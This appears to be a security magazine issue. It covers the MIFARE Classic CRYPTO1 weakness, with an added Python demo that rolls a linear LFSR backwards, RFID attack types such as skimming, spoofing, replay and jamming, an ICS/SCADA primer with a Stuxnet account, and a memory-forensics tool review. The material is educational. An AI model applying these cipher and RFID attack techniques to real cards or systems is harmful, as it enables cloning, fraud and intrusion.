With the work done by the CCC, it is possible to present the CRYPTO1 algorithm of the MIFARE Classic cards in detail. The algorithm consists of an LFSR and a function f(x). In the beginning, the shift register is initialized with the secret key. Afterwards, the PRNG creates 32 bits and XORs them with the UID. This string is then shifted into the state of the shift register. The created random value is also used for the challenge-response protocol between reader and card. At this point the encryption is activated, and all incoming and outgoing bits are XORed with the key stream. The shift register itself is only used for bits containing data or cyclic redundancy check (CRC) values; for encrypting parity bits, a bit of the key stream that was already used for a data bit is used again. Each cycle, the function f(x) computes one bit of the key stream out of 20 bits it gets from the LFSR. The 18 taps of the LFSR are XORed together to fill the first register bit on each shift. Because the taps are combined linearly, the update function contains no non-linearity, which means that once one state of the shift register is known, an attacker can calculate previous states as well as upcoming ones. By today's understanding of crypto systems, this is a serious weakness.
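The following Python is an added illustration, not code from the article or from NXP, of the two register properties the CCC findings above describe: a nonce generator that restarts from a fixed seed at every power-up, and a 48-bit register whose update is a plain XOR of 18 taps and can therefore be stepped backwards as easily as forwards. The tap positions are the ones published in the reverse-engineering literature (Garcia et al., 2008) rather than taken from the article, the non-linear filter f(x) is deliberately left out, and all seeds and states are constructed values.

```python
"""Added example (not from the article): why a purely linear LFSR is a weak
cipher core, modelled on the two MIFARE Classic registers described above.
  * a 16-bit nonce LFSR that restarts from a fixed seed each time the
    (passive) card is powered, so the n-th nonce after power-up repeats;
  * a 48-bit cipher register whose feedback is a plain XOR of 18 taps, so
    knowing one state lets an analyst step backwards as well as forwards.
Tap positions come from the published reverse engineering (Garcia et al.,
2008), not from the article, which only says '18 taps'.  The non-linear
filter f(x) is left out: the point here is the linear update.  All seeds
and states are constructed values; no card or reader is involved."""
from typing import List, Sequence

# 48-bit register x0..x47; x0 leaves on each shift, the new bit enters at x47.
CIPHER_TAPS = (0, 5, 9, 10, 12, 14, 15, 17, 19, 24, 25, 27, 29, 35, 39, 41, 42, 43)
# 16-bit nonce generator: new bit = x0 ^ x2 ^ x3 ^ x5.
NONCE_TAPS = (0, 2, 3, 5)


def int_to_bits(value: int, width: int) -> List[int]:
    """Little-endian bit list: bits[i] is xi."""
    return [(value >> i) & 1 for i in range(width)]


def bits_to_int(bits: Sequence[int]) -> int:
    return sum(b << i for i, b in enumerate(bits))


def lfsr_step(state: List[int], taps: Sequence[int]) -> List[int]:
    """One clock: drop x0, append the XOR of the tapped bits as the new last bit."""
    fb = 0
    for t in taps:
        fb ^= state[t]
    return state[1:] + [fb]


def lfsr_step_back(state: List[int], taps: Sequence[int]) -> List[int]:
    """Undo one clock.  After a shift the register holds x1..xN and its last
    element is fb = x0 ^ (other taps), so x0 = fb ^ (other taps): linearity
    makes the previous state uniquely recoverable."""
    x0 = state[-1]
    for t in taps:
        if t != 0:
            x0 ^= state[t - 1]      # xt now sits one index lower
    return [x0] + state[:-1]


def advance_state(state: int, steps: int, width: int = 48,
                  taps: Sequence[int] = CIPHER_TAPS) -> int:
    """Clock the register forwards 'steps' times and return the new state."""
    bits = int_to_bits(state, width)
    for _ in range(steps):
        bits = lfsr_step(bits, taps)
    return bits_to_int(bits)


def recover_earlier_state(state: int, steps_back: int, width: int = 48,
                          taps: Sequence[int] = CIPHER_TAPS) -> int:
    """What the weakness means in practice: from any one register state,
    walk the linear update backwards to earlier states."""
    bits = int_to_bits(state, width)
    for _ in range(steps_back):
        bits = lfsr_step_back(bits, taps)
    return bits_to_int(bits)


def nonces_after_power_up(seed: int, count: int) -> List[int]:
    """Simplified model of the card nonce generator: the 16-bit LFSR always
    starts from the same seed, and one nonce is read every 16 clocks.  Two
    power-ups therefore yield the same sequence (the CCC timing experiment)."""
    bits = int_to_bits(seed, 16)
    out = []
    for _ in range(count):
        out.append(bits_to_int(bits))
        for _ in range(16):
            bits = lfsr_step(bits, NONCE_TAPS)
    return out


if __name__ == "__main__":
    start = 0x0123456789AB          # constructed 48-bit state, not a real key
    later = advance_state(start, 100)
    print("rolled back to start:", recover_earlier_state(later, 100) == start)
    print("power-up 1:", nonces_after_power_up(0xBEEF, 3))
    print("power-up 2:", nonces_after_power_up(0xBEEF, 3))
```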

Future examples of RFID usage in the internet of things:

In the future we can expect each object in the real world to be tagged with RFID for monitoring, tracking and maintenance purposes. The figure below illustrates one such scenario:

Security and Privacy issues with RFID

Today most of our sensitive information is communicated over the internet and stored on many different devices, and these devices and communication networks increasingly use RFID. Our data is therefore at risk, so let us look at some of the security and privacy issues that must be considered by both organizations and individuals to protect it:

TAG DATA

RFID tags are considered "dumb" devices: they can only listen and respond, no matter who sends the request signal. This brings up the risk of unauthorized access to and modification of tag data. In other words, unprotected tags may be vulnerable to eavesdropping, traffic analysis, spoofing or denial of service attacks. We will look at each of these in turn:

Eavesdropping (or Skimming)

Radio signals transmitted from the tag and the reader can be detected several meters away by other radio receivers. It is therefore possible for an unauthorized user to gain access to the data contained in RFID tags if legitimate transmissions are not properly protected. Any person with their own RFID reader may interrogate tags lacking adequate access controls and eavesdrop on their contents. Researchers in the US have demonstrated a skimming attack on an RFID credit card, through which credit card information, such as the cardholder's name and account information, could be skimmed if not properly encrypted.

Traffic Analysis

Even if tag data is protected, it is possible to use traffic analysis tools to track predictable tag responses over time. Correlating and analyzing the data could build a picture of movement, social interactions and financial transactions. Abuse of traffic analysis would have a direct impact on privacy.

Spoofing

Based on the data collected from eavesdropping or traffic analysis, it is possible to perform tag spoofing. For instance, a software package known as "RFDump", which runs on a notebook computer or personal digital assistant, allows a user to perform reading or writing tasks on most standard smart tags if they are not properly protected. The software permits intruders to overwrite existing RFID tag data with spoofed data. By spoofing valid tags, the intruder could fool an RFID system and change the identity of tags to gain an unauthorized or undetected advantage. One example is trying to save money by buying expensive goods whose RFID price tags have been spoofed to display cheaper prices. By combining the two capabilities of eavesdropping and spoofing, a replay attack is possible, where an attacker can "query a tag, receive the information it sends, and retransmit this information at a later time".

Denial of Service Attack

The problems surrounding security and trust are greatly increased when large volumes of internal RFID data are shared among business partners. A denial of service attack on RFID infrastructure could happen if a large batch of tags has been corrupted. For example, an attacker who gains password access to the tags can use the "kill" command implemented in RFID tags to make them permanently inoperative. In addition, an attacker could use an illegal high-power radio frequency (RF) transmitter in an attempt to jam the frequencies used by the RFID system, bringing the whole system to a halt.

RFID READER INTEGRITY

In some cases, RFID readers are installed in locations without adequate physical protection. Unauthorized intruders may set up hidden readers of a similar nature nearby to gain access to the information being transmitted by the readers, or even compromise the readers themselves, thus affecting their integrity. Unauthorized readers may also compromise privacy by accessing tags without adequate access controls. As a result, information collected by readers and passed to the RFID application may already have been tampered with, changed or stolen by unauthorized persons. An RFID reader can also be a target for viruses. In 2006, researchers demonstrated that an RFID virus was possible: a proof-of-concept self-replicating RFID virus was written to show that a virus could use RFID tags to compromise backend RFID middleware systems via an SQL injection attack.

PERSONAL PRIVACY

As RFID is increasingly used in the retail and manufacturing sectors, the widespread item-level RFID tagging of products such as clothing and electronics raises public concerns regarding personal privacy. People are concerned about how their data is being used, whether they will be subject to more direct marketing, and whether they can be physically tracked by RFID chips. If personal identities can be linked to a unique RFID tag, individuals could be profiled and tracked without their knowledge or consent. For instance, washing clothes tagged with RFID does not remove the chips, since they are specially designed to withstand years of wear and tear. As long as products are embedded with RFID tags, it is possible that everything an individual buys and owns is identified, numbered and tracked, even after the individual leaves the store. RFID readers can detect the presence of these RFID tags wherever they are close enough to receive a signal.


Ways to tackle the security risks in RFID: the areas of RFID that we have to address for security risks are:

1. Tag Data Protection
2. Reader Integrity
3. Personal Privacy

Conclusion

While the use of RFID technology is increasing across a range of different industries, the associated security and privacy issues need to be carefully addressed. Because RFID tags come in different flavors, there is no overall, generic RFID security solution. Some low-cost passive and basic tags cannot execute standard cryptographic operations like encryption, strong pseudorandom number generation and hashing. Other tags cost more than basic RFID tags and can perform symmetric-key cryptographic operations. Organizations wishing to use RFID technology therefore need to evaluate the cost and security implications, as well as understand the limitations of the different RFID technologies and solutions.

About the Authors

Steevan is a Certified Ethical Hacker with over 5 years of experience in software development and information security. He has extensive experience in the security domain, including penetration testing, application vulnerability assessments, hardware security, web services security, network vulnerability assessments, and Android and BlackBerry mobile application testing. Vikram is a senior consultant in the KPMG Global Services Cyber Security practice. He has close to 4 years of experience in enterprise application security, hardware security and information security. He is a gadget lover and his passion lies in mobile security.


Hardware Hacking

Journey to the wonders of ICS Security

Ahmed Fouda, Information Security Engineer at CONNECT-PS

Introduction

Industrial Control Systems play a vital role in our daily life. They control important aspects of different industries that touch our daily life in one way or another. Industrial Control Systems, or ICSs, control everything around you, from small processes such as those in your car to nuclear reactors and aircraft systems. You can find ICSs in most utilities, for example oil and gas, smart grids, water treatment and so on.

Since we are security enthusiasts, when looking into these systems we can clearly see how vulnerable and fragile they can be. These systems are largely obsolete and were not secured by design, so when they were connected to our IT networks they were massively attacked and torn down. You can imagine how catastrophic it would be if someone attacked an ICS that controls prison security gates, the electricity smart grid or even a nuclear reactor.


In the old days, ICS systems were isolated from the internet. An ICS was just used to control a specific industrial process and there was no further need. With the rapid growth of the internet and IT technologies, it became necessary to connect ICS systems to IT networks for real-time monitoring, analysis and even remote control. This led to the exposure of these critical systems to the vulnerabilities of IT networks. Now an attacker can attack an oil and gas company, for example, from outside. After gaining access to the internal network, he can pivot through the network until he reaches a machine that controls a critical process like the flow of gas or petrol in a pipeline. Now he can switch off the flow, causing severe financial loss to the company, and that is the least he can do. He can also raise the flow, causing a disruption or even an explosion that may lead to loss of lives.

It happened before

Attacks against ICS are not that new; targeted and even non-targeted attacks have caused, or almost caused, major damage in the past. I'll mention the most notable ones from my point of view. You can search for more, and I assure you that you will find disasters. Note that all the incidents you are going to find are only the ones disclosed to the public; there are lots of other incidents that were not disclosed for national security reasons or otherwise. The first incident that, in my opinion, changed the history of ICS security is the most advanced ICS malware ever created, called Stuxnet, which hit nuclear reactors in Iran and Russia and some other countries as well. In 2010 Stuxnet was a major topic in worldwide news after the disruption of nuclear centrifuges in the Iranian nuclear facility at Natanz. Stuxnet is a computer virus described as twenty times more complex than an ordinary one, and it targeted only the motors of centrifuges in nuclear facilities, and also pipelines. Stuxnet used four zero-day vulnerabilities in Windows to propagate through networks and replicated itself onto every single thumb drive connected to an infected system. Stuxnet was highly targeted: it would infect a system, look for the specific software used to control Siemens PLCs, look into their control logic and search for any motors controlled by the PLCs. If any motors were found, it would monitor the frequency of the controlled motors, and attack only if those motors spun between 807 Hz and 1210 Hz. Stuxnet attacked these systems by changing their rotational speed, causing an increase in pressure. Moreover, Stuxnet would hide the real values of the system parameters, giving normal readings to the human engineers and operators while playing around with the motors' speeds. If Stuxnet did not find that software on the infected system, it would remain dormant until the system either connected to another network or a thumb drive was plugged into the infected machine; either way, it would replicate itself through the network or the infected USB drives. And by the way, that is how the Iranian nuclear facilities were compromised although they were completely isolated from the internet. The second incident was in October 2013, when an Israeli road control system got hacked, causing a traffic jam on the Haifa highway for more than 20 minutes. Malware infected a security camera in the Carmel Tunnel toll road and was able to gain control of it. The next day, it shut down the roadway again during the morning rush hour. It remained shut for eight hours, causing massive congestion. Experts who investigated this incident said that the malware was not sophisticated enough to be the work of another government and that it was more likely done by hacktivists. There are a lot of incidents involving attacks on ICS systems that caused severe damage, and in some cases people actually died, but I mentioned the above two incidents to demonstrate how computer viruses, mere series of ones and zeros, can be weapons in cyberwarfare. And in cyberwarfare, what is a better target than an ICS when trying to harm your opponent's infrastructure?!

What is ICS?

"Industrial Control System" is a general term that encompasses several types of control systems used in industrial production, for example Distributed Control Systems [DCS] and Supervisory Control And Data Acquisition [SCADA]. ICSs control different types of industrial processes, such as electrical, chemical, water, and oil and gas.

Distributed Control Systems [DCS]

A DCS controls industrial processes within the same geographic area, such as a plant or a field. A DCS can be dissected into two types of components. The first is the field devices spread across the plant to do the hard and dirty work, and the second is the controlling devices located in the control room inside the plant or field. In this control room, human operators monitor the operation of the industrial process outside and issue commands according to the readings coming from the field devices. Note that all of this happens in the same geographic area.


Supervisory Control and Data Acquisition [SCADA]

SCADA differs from DCS in that there is a centralized system that monitors and controls entire sites or complexes of systems spread out over a large area, such as a country or even a continent.

SCADA can be divided into two parts:

- Supervisory Control: responsible for automating the control of running industrial processes with no human interaction, using Remote Terminal Units [RTUs], Intelligent Electronic Devices [IEDs], Programmable Logic Controllers [PLCs] or any other type of controller.

- Data Acquisition: starts at the RTU/PLC level, where analog signals coming from field devices are converted to digital signals and sent back to Human Machine Interfaces [HMI], so the human operator can monitor the readings of the running process and make supervisory decisions to adjust or override normal RTU/PLC control.

SCADA systems are now the most widely used systems across the globe, since they make it possible to control many remote sites from a single central location. When dissecting SCADA components, they can be categorized according to their geographical position into two categories:

- Field Components
- Control Center Components

Figure: SCADA architecture

We will look into each component, explaining how it works and its role in the SCADA architecture. We will focus on control center devices and the controllers in the field. We'll also give a brief description of other field devices like sensors and motors.

Field Components

Field devices include those components that exist in the field and participate directly in the running industrial process. They can be categorized into three types according to their role:

- Information Gathering Devices
- Controllers
- Action Devices

Information Gathering Devices

These devices are responsible for gathering information about the various parameters of the industrial process, such as heat, pressure, flow, level and many others. These devices are called sensors. Sensors are widely used in any control system, as they are considered the eyes and ears of every process controller.

Controllers

Controllers are considered the mind of the ICS. Sensors gather information about the process and pass it to controllers; controllers process this information and issue the right commands according to the logic they were programmed with, then pass these commands to action devices. The most common types of controllers are Programmable Logic Controllers [PLCs], Remote Terminal Units [RTUs] and Intelligent Electronic Devices [IEDs].

PLCs / RTUs

There is a significant difference between PLCs and RTUs. A while back, PLCs were used only to control the industrial process, and RTUs were used as communication translators between components in the field and the control center. An RTU is a microprocessor-controlled device that understands the analog signals coming from field devices like sensors and converts them into digital signals and packets that control center devices can process. RTUs also receive digital inputs from control center components and translate them back into analog signals that can be processed by field devices. So RTUs mainly interface field devices to control center components. Nowadays, PLCs have taken over the job of RTUs besides their main job of automating process control. PLCs have become digital, computer-based controllers directly connected to both field devices and control center devices. A PLC handles the communication between the control center and the field devices: it sends the current values of the different process parameters to the control room devices, values fetched from the sensors that are also connected to the PLC, and it also sends commands to the action devices.

Action Devices

Action devices are considered the arms of the ICS. They are the ones who do the dirty work in the field. They receive commands from controllers and execute them. These devices could be a motor or a pump, for example, and the actions could be starting or stopping a motor, raising its rotational speed, or switching a pump on or off.


Control Center Components

The control center of any ICS contains different types of components that assist human engineers and operators in monitoring the running industrial process. The control center may be connected to the IT network of the company to help upper-layer managers take real-time decisions, such as starting, holding or stopping the operation, according to the real-time feeds they get from the control center. These are the most common components you can find in a control center:

- HMI Servers
- Historians
- Controllers
- Engineering Station

Note that controllers can also be found in control centers rather than in the field; in some applications controllers are required to be near the human engineers.

HMI Servers

HMI servers, or Human Machine Interfaces, are responsible for visualizing the running process so that human operators can observe the current values of the different parameters of the running process and also issue commands to adjust these parameters' values through this interface. HMIs are connected to controllers to get the values of the different industrial process parameters, and they can adjust these parameters through commands received from human operators or engineers. An HMI is basically a software solution; each ICS vendor has its own version of HMI software. This software can be a desktop application that can only be accessed on a single machine, or a web-based application that can be accessed both onsite and remotely. The latter makes it easier for human operators to handle ICS processes anywhere, even using their smartphones.

Historians

Historian servers are important for retaining the events that happen across the SCADA system. Events in a SCADA system could be a motor start or stop, a temperature rise, or an alarm that was set off because of a critical condition in the system. Historians basically collect data from the various devices in the SCADA network and log it to a database in real time. They also capture plant management information about production status, performance monitoring and quality assurance. Historian systems also offer the ability to view the logged data, normally in graph form, thus showing the change of a specific value over time.

Engineering Station

The engineering station is a computer used to update the control logic of PLCs and RTUs. It is used by engineers to change what output an RTU or PLC should give when a certain input occurs. It is also used for updating the firmware of PLCs, RTUs and IEDs. Engineering stations are very similar to computers with IDE [Integrated Development Environment] software that developers use to develop applications, for example NetBeans or Visual Studio, but in this case engineers use other software to develop control logic for the controllers. Each controller vendor has its own software, specially designed to develop control logic for its PLCs or RTUs.

How is all of this tied together?

SCADA components are connected together in two types of networks. The first network connects field devices and controllers, and they all speak analog signals. The second connects controllers or signal converters (RTUs) with HMI servers, historians, engineering stations and application servers. All of these speak in packets, meaning that they communicate through the normal TCP/IP packets we are used to seeing in IT networks, like HTTP, SMTP, DNS and so on. The difference is that OT networks speak different application protocols, for example Modbus, DNP3, IEC 60870-5, EtherNet/IP, OPC and many others. Some of these protocols are open and others are proprietary, limited to the products of one specific vendor.

Conclusion

To really understand the risks facing our critical infrastructure, we should understand its architecture and how all of its components are connected together. I hope this article gave you a glimpse of what ICS systems look like and how they operate. The next step after understanding the ICS architecture components and how they are tied together is to dissect the different industrial protocols in depth, understand how they work in real-world scenarios, and then study their vulnerabilities and weaknesses. I hope you liked this journey, and I look forward to seeing you next time in another article.


Cyber Talents started a crowdfunding campaign on Zoomaal to raise 20,000 USD

You might have heard about the famous software development competitions like ACM, Google Jam or Facebook Hacker, how those competitions bring talented software developers from all over the world together in one place, and how software companies and recruiters wait for those competitions year after year to hire the best software developers for their organizations. But what about cyber security? According to the CISCO Annual Report in 2014, nearly one million job openings in the cyber security field are waiting for candidates to fill them. It has become clear that the normal recruiting process is not working well. Most recruitment processes focus on IQ exams and language exams, but when it comes to the technical part, which is the core of the security professional's job, the company relies only on technical interviews or just takes the shiny certificates at face value. Another main reason is that building a separate environment or lab for practical tests, including different machines, costs the organization a lot of money and a lot of administration effort. It is obvious that we need a new way to measure the skills of cyber security professionals. Moataz Salah and Adham Mohamed, founders of the Cyber Talents portal, said: "Today, cyber security certificates are not measuring the real practical skills of any candidate. After running four Capture the Flag competitions at the Cairo Security Camp conference for 4 years, we realized that games and competitions are the best environment to spot skills and talent in any field at an early stage. That's why we started to work on Cyber Talents." Cyber Talents is a portal that will let schools, universities, companies and governments measure, assess and recruit cyber security candidates through hackathons, competitions, and online lab challenges and assessments.

Each user will have their own account and work on solving hundreds of challenges in different cyber security fields, for example network security, web application security, reverse engineering, digital forensics, cryptography and others. The more challenges you solve, the higher you rank, either within your country or worldwide. The cycle is closed by giving companies and recruiters who are desperately searching for cyber security talent access to those talents. Moataz Salah and Adham Mohamed started a crowdfunding campaign on Zoomaal to raise 20,000 USD to be able to make their dream come true. Cyber Talents will be the first platform to assess and measure the skills of cyber security professionals in a unique way, using online games and challenges, with the clear goal of minimizing the shortage of technical cyber security professionals. The Cyber Talents project will start its beta version by the end of this year. The team is seeking your support and contribution, even by simply sharing the project's idea. To learn more about the project, check the link below:

http://www.zoomaal.com/projects/48486?ref=38627481



Reviews

Malware Review

GVol: a GUI app built in Java for the purpose of malware analysis

May Medhat, Malware Analyst at EG-CERT

Mohamed Shawky, Developer at EG-CERT

Every function performed, whether by an application or by the operating system, produces a particular change in memory (RAM). Consequently, analyzing the data captured in a memory image acquired from a target system gives extraordinary insight into the runtime state of the system, enabling the analyst to track recent activity and bypass hiding techniques such as those used by rootkits. Furthermore, using memory analysis the analyst can examine critical data such as unencrypted mails, non-cacheable internet history events, code injection, etc. Moreover, it is very useful in malware analysis, allowing the analyst to know what occurred before and after the infection of the system. One of the best toolkits for memory analysis is Volatility. In this article, we introduce GVol, a GUI and automation tool for the Volatility framework. GVol is a lightweight GUI application built in Java, designed to automate the use of the Volatility toolkit for the purpose of malware analysis. The application includes various Volatility plugins with their predefined options. In addition, users can create batch files to run multiple plugins at once to scan a memory image. Furthermore, GVol includes pre-configured batch files to simplify the use of Volatility in the malware analysis process.


The supported operating systems are Windows XP, 7, 8, 8.1, and Linux. The application requires the Java Runtime Environment. GVol ships with some predefined batch files, plugins, options and profiles.

GVol Features:
1. GVol automates the use of Volatility through a graphical user interface.
2. It works with any Volatility version.
3. GVol includes a set of predefined profiles for Windows operating systems; the user can also add new profiles for other operating systems.
4. The user can select plugins and related options from the existing database or add new plugins or options.
5. GVol has a batch file feature to run multiple plugins. In addition, the user can set options for each plugin in a batch file through a graphical wizard.
6. GVol contains plugin descriptions and malware analysis hints gathered from “The Art of Memory Forensics” book and the “Volatility Command Reference”, which can be downloaded from this link: https://code.google.com/p/wiki/CommandReference23
7. GVol has a console output section which shows the command running in the background as well as the output generated. The user can choose to write this output to a file. The output file name will be a concatenation of the image name, the batch file name (if one was used) and the plugin name.

How to Use GVol:
1. Download GVol from the following link: https://github.com/eg-cert/GVol
2. Open the file “GVol.jar” to open the GVol main interface.

GVol Configuration:
1. Download the Volatility toolkit: https://code.google.com/p/Volatility/downloads/list
2. Select “Configuration” from the main interface to edit Volatility configurations.
3. Select “Command & Profiles”.
4. Type the command that runs Volatility. It would be the path of the standalone executable, or “python vol.py” if you use the Python script. Do not forget to click on “Apply Changes”.
5. Profiles can be added through the “Add new profiles” section by typing the new Volatility profile and its description, then clicking “Add Profile”.
6. To add new options or delete an old one, select “Volatility Options” from the “Configuration” menu.
7. The user can also edit Volatility plugins and select their convenient options by selecting plugins from the “Configuration” menu.
8. The user can also update a plugin description by typing the plugin name and its description, then clicking “Yes” to update the existing plugin.

GVol Batch File Feature:
The user can run multiple plugins to scan a single image through batch files as follows:
1. First of all, a batch file must be added or selected from the main menu.
2. Select File, then “Manage Batch Files”.
3. A new batch file can be added by typing its name in the “Add new batch file” section.
4. Attach the required plugins to the selected batch file from “Add Plugins to the Selected Batch File”.

Running GVol:
The user can choose between two options: running GVol with a single plugin, or running multiple plugins by using the batch file option.

Running a single plugin:
1. Determine the target image to scan and specify its profile.
2. Check the plugin description and hints by pausing the mouse pointer over the selected plugin.
3. Choose plugins and set their options.
4. Select “Write the output to a file”.
5. Select the output directory.
6. Click “Run command”.

Notes: You can run another command simultaneously by repeating steps 1-6. The output of the new command will be visible in a new tab in the output area. You can stop a running command by selecting its tab and clicking on the “Close current tab” button.

Running multiple plugins:
1. Determine the target image to scan and specify its profile.
2. Select the check box “Run batch file”.
3. Specify the required batch file.
4. Select the output directory.
5. Click “Run Batch”.
6. A wizard will appear to let the user set options for each plugin listed in the selected batch file.

GVol includes preconfigured batch files; each batch file contains some plugins that can be used to achieve a certain scanning or detection. The batch files currently available in GVol are: Code injection, Network artifacts, Rogue processes, Process objects analysis and Rootkits.

GVol Output:
After running a single plugin or a batch file, the user can check the running command and its output in “Console Output”.

If the user selected the “write the output to a file” option and specified the output directory, the output file will be generated as follows:

- For a single plugin, the output file name is composed as shown below:
  • Image name: Windows XP Professional-Snapshot1
  • Plugin name: psxview
  • Output file number: output0

- For a batch file, the output file name is composed as shown below:
  • Image name: Windows XP Professional-Snapshot1
  • Batch file name: Rogue Processes
  • Plugin name: psxview
  • Output file number: output0
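As an added example (not GVol's own code, which is Java), here is a small Python sketch of the automation the article describes: one Volatility 2 command per plugin in a batch, and one output file per plugin named from the image, batch file and plugin, with the output number incremented when a file of that name already exists. The “python vol.py” launcher, the “_” separator and the plugin list of the Rogue Processes batch are assumptions; the page does not give GVol's actual separator or batch contents.

```python
"""Added example, not GVol's own Java code: a small batch runner mimicking what
the article says GVol does for Volatility 2 (one command per plugin, one output
file per plugin named from image, batch and plugin). Assumptions not on the page:
Volatility is launched as "python vol.py", the filename separator is "_", and the
batch contents below are constructed."""
import shlex
import subprocess
from pathlib import Path

# Constructed batch definition: the page names a "Rogue Processes" batch but
# not its plugins; pslist, psscan and psxview are real Volatility 2 plugins.
BATCH_FILES = {
    "Rogue Processes": [("pslist", []), ("psscan", []), ("psxview", [])],
}

def build_command(vol_cmd, image, profile, plugin, options=()):
    """Volatility 2 syntax: <vol_cmd> -f <image> --profile=<profile> <plugin> [options]."""
    return shlex.split(vol_cmd) + ["-f", str(image), f"--profile={profile}", plugin, *options]

def output_filename(image, plugin, batch=None, existing=frozenset()):
    """Image stem + batch name (if used) + plugin + outputN, where N is the first
    number whose file name is not already in `existing` (GVol shows output0)."""
    base = "_".join([Path(image).stem] + ([batch] if batch else []) + [plugin])
    number = 0
    while f"{base}_output{number}.txt" in existing:
        number += 1
    return f"{base}_output{number}.txt"

def plan_batch(vol_cmd, image, profile, batch, existing=frozenset()):
    """Return (command, output file name) pairs for every plugin in the batch."""
    plan, taken = [], set(existing)
    for plugin, options in BATCH_FILES[batch]:
        name = output_filename(image, plugin, batch, taken)
        taken.add(name)
        plan.append((build_command(vol_cmd, image, profile, plugin, options), name))
    return plan

def run_batch(vol_cmd, image, profile, batch, out_dir):
    """Execute the plan, writing each plugin's stdout and stderr to its own file."""
    out_dir = Path(out_dir)
    out_dir.mkdir(parents=True, exist_ok=True)
    existing = {p.name for p in out_dir.iterdir()}
    for cmd, name in plan_batch(vol_cmd, image, profile, batch, existing):
        proc = subprocess.run(cmd, capture_output=True, text=True)
        (out_dir / name).write_text(proc.stdout + proc.stderr)
    return sorted(p.name for p in out_dir.iterdir())
```

`plan_batch` can be inspected before anything is executed, which is a convenient place to confirm the profile and options match the image being analyzed.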



Reviews Course Review

Bluekaizen signed an agreement with ISACA to be the first Cyber security Nexus™ (CSX) Partner in the Middle East

Today, the impact and sophistication of cyber security challenges and attacks have created a global demand for talent that is outpacing the supply. To help fill the growing cyber security skills gap, ISACA created Cyber security Nexus (CSX) to provide guidance, career development, education and community for professionals at every stage of their careers.

BK Team



At the Cairo Security Camp 2015 conference, Bluekaizen announced that it had successfully signed an agreement with ISACA to be the first partner for CSX courses in the Middle East.

Today, cyber security professionals can pursue the CSX Practitioner (CSXP) certification, which demonstrates the ability to be a first responder to cyber incidents, following established procedures and defined processes. CSXP indicates firewall, patching and anti-virus experience, as well as the ability to implement common security controls and perform vulnerability scans and analysis. Training for the exam is available through the following courses, which combine lecture and cyber lab experience and are offered through Bluekaizen as the official training partner in the Middle East.

Level 1: Identification and Protection. You’ll learn how to apply industry-developed, experience-based methods to the identification of key networks, and learn to develop appropriate protection mechanisms.

Level 2: Detection. You’ll learn how to apply industry-developed, experience-based methods to leverage cyber security controls in order to identify system events and non-event level incidents, and gain the skills necessary to detect potential network events and incidents.

Level 3: Respond and Recover. You’ll learn how to apply industry-developed, experience-based methods required to draft and execute comprehensive incident response plans and documentation, and to recuperate a system or network.



There will also be new CSX trainings that will be available later in 2015 from

Specialist

After completing the Practitioner level, cyber security professionals can earn a CSX Specialist certification, designating them as specialists in one or more of five areas aligned to global cyber security frameworks: Identify, Protect, Detect, Respond, Recover.

Expert

This certification is designed for those with master-level technical skills who serve as an authoritative source for cyber security matters within an organization.

The First Class for CSX Practitioner Level 1 will be available through Bluekaizen on March 2016.
